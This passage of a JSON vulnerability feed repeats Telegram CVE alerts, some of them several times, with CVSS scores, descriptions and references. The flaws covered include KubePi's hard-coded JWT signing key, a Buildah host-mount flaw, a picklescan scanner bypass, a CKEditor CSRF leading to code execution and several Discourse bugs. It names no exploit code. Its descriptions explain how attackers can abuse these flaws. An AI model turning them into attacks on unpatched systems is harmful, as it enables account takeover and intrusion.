"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJHF-8VQX-VQPQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7061", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22463\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code. The vulnerability has been fixed in 1.6.3. In the patch, JWT key is specified in app.yml. If the user leaves it blank, a random key will be used. There are no workarounds aside from upgrading.\n\ud83d\udccf Published: 2023-01-04T15:04:18.195Z\n\ud83d\udccf Modified: 2025-03-10T21:32:56.890Z\n\ud83d\udd17 References:\n1. https://github.com/KubeOperator/KubePi/security/advisories/GHSA-vjhf-8vqx-vqpq\n2. https://github.com/KubeOperator/KubePi/commit/3be58b8df5bc05d2343c30371dd5fcf6a9fbbf8b\n3. https://github.com/KubeOperator/KubePi/blob/da784f5532ea2495b92708cacb32703bff3a45a3/internal/api/v1/session/session.go#L35\n4. https://github.com/KubeOperator/KubePi/releases/tag/v1.6.3", "creation_timestamp": "2025-03-10T21:39:13.000000Z"}, {"uuid": "1e8e3877-498f-4039-8e62-6b52d763364d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2449", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "3e72d3bc-40c8-42ef-8a7d-870765e1aee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8P7G-3WM6-P3RM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7069", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46168\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta15 on the `beta` and `tests-passed` branches, recipients of a group SMTP email could see the email addresses of all other users inside the group SMTP topic. Most of the time this is not an issue as they are likely already familiar with one another's email addresses. This issue is patched in versions 2.8.14 and 2.9.0.beta15. The fix is that someone sending emails out via group SMTP to non-staged users masks those emails with blind carbon copy (BCC). Staged users are ones that have likely only interacted with the group via email, and will likely include other people who were CC'd on the original email to the group. As a workaround, disable group SMTP for any groups that have it enabled.\n\ud83d\udccf Published: 2023-01-05T17:18:58.143Z\n\ud83d\udccf Modified: 2025-03-10T21:32:09.707Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-8p7g-3wm6-p3rm\n2. https://github.com/discourse/discourse/pull/19724", "creation_timestamp": "2025-03-10T21:39:26.000000Z"}, {"uuid": "d2afd746-50b4-4ddc-b6df-89218965a8a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P47G-V5WR-P4XP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7068", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23549\n\ud83d\udd25 CVSS Score: 5.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta16 on the `beta` and `tests-passed` branches, users can create posts with raw body longer than the `max_length` site setting by including html comments that are not counted toward the character limit. This issue is patched in versions 2.8.14 and 2.9.0.beta16. There are no known workarounds.\n\ud83d\udccf Published: 2023-01-05T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-10T21:32:15.478Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/commit/bf6b08670a927cc80bb090b7a2e710b4b554e6a8\n2. https://github.com/discourse/discourse/security/advisories/GHSA-p47g-v5wr-p4xp", "creation_timestamp": "2025-03-10T21:39:22.000000Z"}, {"uuid": "50661aab-70c5-449d-9de3-29a932a202ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2545", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7075", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0604\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Keycloak. When an Active Directory user resets their password, the system updates it without performing an LDAP bind to validate the new credentials against AD. This vulnerability allows users whose AD accounts are expired or disabled to regain access in Keycloak, bypassing AD restrictions. The issue enables authentication bypass and could allow unauthorized access under certain conditions.\n\ud83d\udccf Published: 2025-01-22T14:34:45.923Z\n\ud83d\udccf Modified: 2025-03-11T00:16:04.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2544\n2. https://access.redhat.com/errata/RHSA-2025:2545\n3. https://access.redhat.com/security/cve/CVE-2025-0604\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2338993", "creation_timestamp": "2025-03-11T00:47:17.000000Z"}, {"uuid": "71397aea-4cbc-44ac-acd9-0f0e302dfc80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5WWW-JXVF-VRC3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46177\n\ud83d\udd25 CVSS Score: 5.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, when a user requests for a password reset link email, then changes their primary email, the old reset email is still valid. When the old reset email is used to reset the password, the Discourse account's primary email would be re-linked to the old email. If the old email address is compromised or has transferred ownership, this leads to an account takeover. This is however mitigated by the SiteSetting `email_token_valid_hours` which is currently 48 hours. Users should upgrade to versions 2.8.14 or 3.0.0.beta15 to receive a patch. As a workaround, lower `email_token_valid_hours ` as needed.\n\ud83d\udccf Published: 2023-01-05T19:48:05.483Z\n\ud83d\udccf Modified: 2025-03-10T21:31:57.876Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-5www-jxvf-vrc3\n2. https://github.com/discourse/discourse/commit/4bf306f0e3bf54a9ef9c5886bf1cfb85c20da570\n3. https://github.com/discourse/discourse/commit/83944213b2b2454af80d0407f60d67641b1f0b38", "creation_timestamp": "2025-03-10T21:39:28.000000Z"}, {"uuid": "55b719ef-b3de-4429-a6fe-859e2945f1f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8707", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "b2e45904-657b-4e52-a895-f48a204addb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3018", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14537", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12397\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in Quarkus-HTTP, which incorrectly parses cookies with\ncertain value-delimiting characters in incoming requests. This issue could\nallow an attacker to construct a cookie value to exfiltrate HttpOnly cookie\nvalues or spoof arbitrary additional cookie values, leading to unauthorized\ndata access or modification. The main threat from this flaw impacts data\nconfidentiality and integrity.\n\ud83d\udccf Published: 2024-12-12T09:05:28.451Z\n\ud83d\udccf Modified: 2025-05-02T16:29:42.017Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0900\n2. https://access.redhat.com/errata/RHSA-2025:1082\n3. https://access.redhat.com/errata/RHSA-2025:3018\n4. https://access.redhat.com/security/cve/CVE-2024-12397\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2331298", "creation_timestamp": "2025-05-02T17:16:41.000000Z"}, {"uuid": "2dff8103-492a-458a-8dd8-446f5878e22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8703", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "15da9341-d456-46ef-8893-4630d058e6ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8846", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "c27c3112-6303-49ac-8b33-027690c80a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8679", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "b8f7a4fe-bc85-461b-8a80-8db8317cbb16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RW2-F4X7-7PXF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7067", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23548\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta16 on the `beta` and `tests-passed` branches, parsing posts can be susceptible to regular expression denial of service (ReDoS) attacks. This issue is patched in versions 2.8.14 and 2.9.0.beta16. There are no known workarounds.\n\ud83d\udccf Published: 2023-01-05T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-10T21:32:22.096Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-7rw2-f4x7-7pxf\n2. https://github.com/discourse/discourse/pull/19737", "creation_timestamp": "2025-03-10T21:39:21.000000Z"}, {"uuid": "b10eaf40-1909-4c16-aa9f-9f112b3ff06d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2M76-CWHG-7WV6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7257", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2905\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A security vulnerability has been discovered within rpm-ostree, pertaining to the /etc/shadow file in default builds having the world-readable bit enabled. This issue arises from the default permissions being set at a higher level than recommended, potentially exposing sensitive authentication data to unauthorized access.\n\ud83d\udccf Published: 2024-04-25T17:44:15.985Z\n\ud83d\udccf Modified: 2025-03-12T02:26:09.653Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:3401\n2. https://access.redhat.com/errata/RHSA-2024:3823\n3. https://access.redhat.com/security/cve/CVE-2024-2905\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2271585\n5. https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6", "creation_timestamp": "2025-03-12T02:40:26.000000Z"}, {"uuid": "796f1a61-b759-44a1-a62c-8eb19042750d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7Q5R-7GVP-WC82", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6990", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1944\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L)\n\ud83d\udd39 Description: picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch's more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.\n\ud83d\udccf Published: 2025-03-10T11:30:32.896Z\n\ud83d\udccf Modified: 2025-03-10T11:30:32.896Z\n\ud83d\udd17 References:\n1. https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944\n2. https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82\n3. https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781", "creation_timestamp": "2025-03-10T11:56:28.000000Z"}, {"uuid": "c2833885-c5a5-4266-835e-672e9b7373e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MJP-2RM6-9G85", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7060", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22457\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: CKEditor Integration UI adds support for editing wiki pages using CKEditor. Prior to versions 1.64.3,t he `CKEditor.HTMLConverter` document lacked a protection against Cross-Site Request Forgery (CSRF), allowing to execute macros with the rights of the current user. If a privileged user with programming rights was tricked into executing a GET request to this document with certain parameters (e.g., via an image with a corresponding URL embedded in a comment or via a redirect), this would allow arbitrary remote code execution and the attacker could gain rights, access private information or impact the availability of the wiki. The issue has been patched in the CKEditor Integration version 1.64.3. This has also been patched in the version of the CKEditor integration that is bundled starting with XWiki 14.6 RC1. There are no known workarounds for this other than upgrading the CKEditor integration to a fixed version.\n\ud83d\udccf Published: 2023-01-04T14:24:39.871Z\n\ud83d\udccf Modified: 2025-03-10T21:33:09.143Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki-contrib/application-ckeditor/security/advisories/GHSA-6mjp-2rm6-9g85\n2. https://github.com/xwiki-contrib/application-ckeditor/commit/6b1053164386aefc526df7512bc664918aa6849b\n3. https://jira.xwiki.org/browse/CKEDITOR-475", "creation_timestamp": "2025-03-10T21:39:12.000000Z"}, {"uuid": "53917d02-625c-4d48-8a9a-5453d59b66e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CG-7GW9-V8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7104", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2177\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability classified as critical was found in libzvbi up to 0.2.43. This vulnerability affects the function vbi_search_new of the file src/search.c. The manipulation of the argument pat_len leads to integer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.2.44 is able to address this issue. The patch is identified as ca1672134b3e2962cd392212c73f44f8f4cb489f. It is recommended to upgrade the affected component. The code maintainer was informed beforehand about the issues. She reacted very fast and highly professional.\n\ud83d\udccf Published: 2025-03-11T07:31:06.438Z\n\ud83d\udccf Modified: 2025-03-11T07:31:06.438Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.299206\n2. https://vuldb.com/?ctiid.299206\n3. https://vuldb.com/?submit.512803\n4. https://github.com/zapping-vbi/zvbi/security/advisories/GHSA-g7cg-7gw9-v8cf\n5. https://github.com/zapping-vbi/zvbi/commit/ca1672134b3e2962cd392212c73f44f8f4cb489f\n6. https://github.com/zapping-vbi/zvbi/releases/tag/v0.2.44", "creation_timestamp": "2025-03-11T07:39:31.000000Z"}, {"uuid": "6d6fccdb-a3d6-4f7c-932a-571079494a0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX97-6494-P2RV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7072", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22453\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, the number of times a user posted in an arbitrary topic is exposed to unauthorized users through the `/u/username.json` endpoint. The issue is patched in version 2.8.14 and 3.0.0.beta16. There is no known workaround.\n\ud83d\udccf Published: 2023-01-05T19:53:34.180Z\n\ud83d\udccf Modified: 2025-03-10T21:31:52.286Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-xx97-6494-p2rv\n2. https://github.com/discourse/discourse/commit/cbcf8a064b4889a19c991641e09c399bfa1ef2ad", "creation_timestamp": "2025-03-10T21:39:29.000000Z"}, {"uuid": "4648f6a4-803e-42a0-8003-0fe9323dd924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7582", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-14T16:37:39.420Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. 